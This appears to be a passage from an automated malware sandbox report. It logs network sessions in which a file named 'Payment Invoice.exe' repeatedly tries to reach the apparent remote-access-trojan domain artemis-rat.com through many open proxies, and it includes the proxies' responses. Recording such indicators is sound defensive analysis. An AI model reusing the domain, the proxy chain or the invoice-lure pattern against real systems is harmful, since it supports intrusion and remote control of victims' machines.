                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.589468002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.676245928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.776829958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.776770115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.776740074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.901765108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1349192.168.2.45407394.247.241.70536407076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.494815111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.241782904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.385514021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.589660883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.098526955 CET202INHTTP/1.0 404 Not Found
                                                                Content-Length: 717
                                                                Content-Type: text/html
                                                                Date: Fri, 09 Feb 2024 12:19:51 GMT
                                                                Expires: Fri, 09 Feb 2024 12:19:51 GMT
                                                                Server: Mikrotik HttpProxy
                                                                Proxy-Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1350192.168.2.453905117.160.250.13388997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.495052099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.088357925 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1351192.168.2.453046111.20.217.17890917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.496964931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.514961004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.527096033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.197455883 CET325INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.1
                                                                Date: Mon, 11 Mar 2024 15:14:46 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1352192.168.2.45323040.76.160.14390007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.498104095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1353192.168.2.45412272.10.160.90295177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.499763966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.131333113 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1354192.168.2.45219688.204.216.142361207076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.503297091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.589298964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.589857101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.353341103 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1355192.168.2.454080115.84.248.14080807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.554452896 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:20.864770889 CET1286INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Content-Length: 3172
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 5a 65 72 6f 20 31 31 2e 32 2e 30 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 2c 20 4d 50 47 2c 20 4d 69 6b 65 20 47 6c 65 61 76 65 73 2c 20 52 69 63 2c 20 55 6e 69 53 65 72 76 65 72 2c 20 4f 6c 61 6a 69 64 65 2c 20 42 6f 62 53 20 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 2e 69 6e 74 72 6f 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 37 45 37 46 44 3b 0d 0a 7d 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0d 0a 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0d 0a 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 75 6e 69 66 6f 72 6d 73 65 72 76 65 72 2e 63 6f 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 61 6c 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 22
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><title>The Uniform Server </title><meta name="Description" content="The Uniform Server Zero 11.2.0" /><meta name="Keywords" content="The Uniform Server, MPG, Mike Gleaves, Ric, UniServer, Olajide, BobS " /><link rel="stylesheet" type="text/css" href="css/style.css" media="screen" /></head><style type="text/css">/*****************************************/.intro{ margin-top:30px; padding:10px; font-size:12px; font-family:Verdana; background-color: #E7E7FD;}/*****************************************/</style><body><div id="wrap"> <div id="header"> <a href="http://www.uniformserver.com"><img src="images/logo.png" align="left" alt="The Uniform Server"
                                                                Mar 11, 2024 16:15:21.189527988 CET454INHTTP/1.1 400 Bad Request
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                Content-Length: 226
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1356192.168.2.45404880.249.112.162807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.554526091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.949976921 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1357192.168.2.45328945.185.163.1119997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.554610968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.620656967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1358192.168.2.452114122.114.232.1378087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.567229033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1359192.168.2.45408547.243.205.131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.571976900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1360192.168.2.453274184.178.172.2341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.572227955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1361192.168.2.454078125.122.26.24210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.575134993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1362192.168.2.453252160.248.80.9125257076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.575238943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1363192.168.2.454135184.185.2.1241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.575526953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1364192.168.2.453224128.199.196.31577157076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.576375961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.323910952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527316093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.823990107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.027177095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.324348927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1365192.168.2.453379192.169.226.96505787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.576426983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.589500904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.589854956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.589462996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.676240921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.776761055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
